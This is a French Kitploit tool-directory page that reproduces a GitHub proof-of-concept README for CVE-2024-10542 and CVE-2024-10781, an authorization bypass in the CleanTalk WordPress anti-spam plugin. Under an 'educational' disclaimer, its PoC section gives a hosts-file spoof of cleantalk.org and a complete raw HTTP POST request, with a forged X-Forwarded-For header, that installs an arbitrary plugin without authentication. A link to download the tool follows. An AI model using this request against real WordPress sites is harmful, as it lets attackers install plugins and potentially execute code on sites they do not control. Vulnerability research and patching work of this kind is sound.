Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ubaydev/cve-2024-10542
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 est vulnérable à l'installation non authentifiée et arbitraire de plugins.

Voir le dépôt
31il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC de CVE-2024-10542 et CVE-2024-10781 - Authentification brisée dans le plugin Spam protection, AntiSpam, FireWall by CleanTalk <= 6.43.2

Avertissement :

Les informations fournies dans ce document concernant CVE-2024-10542 sont destinées uniquement à des fins d'apprentissage et d'éducation. Nous n'encourageons ni n'autorisons l'utilisation de ces informations à des fins nuisibles, y compris, mais sans s'y limiter, l'exploitation, le sabotage de systèmes ou d'autres activités illégales.

Introduction :

Dans un paysage numérique de plus en plus complexe, assurer la sécurité des sites web est primordial pour de nombreux propriétaires de sites. Récemment, deux vulnérabilités critiques ont été découvertes, constituant une menace significative pour les sites WordPress. Ces vulnérabilités affectent le célèbre plugin CleanTalk, qui offre une protection anti-spam, des mesures anti-spam et un pare-feu. Qu'est-ce qui rend cette situation encore plus urgente ? Approfondissons ! Deux vulnérabilités, identifiées comme CVE-2024-10542 et CVE-2024-10781, pourraient permettre à des attaquants non authentifiés d'installer et d'activer des plugins malveillants sur des sites vulnérables. Cela compromet non seulement la réputation du site, mais ouvre également la porte à l'exécution de code à distance. Avec un score CVSS de 9,8 sur 10, il est évident que ces vulnérabilités entrent dans la catégorie très dangereuse. Selon Wordfence, les deux vulnérabilités concernent un problème de contournement d'autorisation qui pourrait permettre à un acteur malveillant d'installer et d'activer des plugins arbitraires. Cela pourrait ensuite ouvrir la voie à une exécution de code à distance si le plugin activé est lui-même vulnérable.

PoC :

Tout d'abord, les utilisateurs malveillants définiront leur fichier hosts sur leur système d'exploitation :

root@kitploit:~
127.0.0.1 cleantalk.org

après quoi ils envoient une requête comme celle-ci :

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

Conclusion :

La cybersécurité est une responsabilité partagée par chaque propriétaire de site. En maintenant les plugins à jour et en restant vigilant face aux vulnérabilités potentielles, nous pouvons protéger nos sites contre les attaques malveillantes. Assurez-vous d'avoir mis à jour CleanTalk vers la dernière version et effectuez des vérifications de routine sur les autres plugins pour garantir une sécurité maximale. Souvenez-vous, de petites étapes peuvent prévenir de grands désastres !

Références :

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

Offrez-moi un café :

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

Remerciements :

Allah, Muhammad SAW, mikemyers, Markdown Monster, ma famille, vous ?

Télécharger l’outil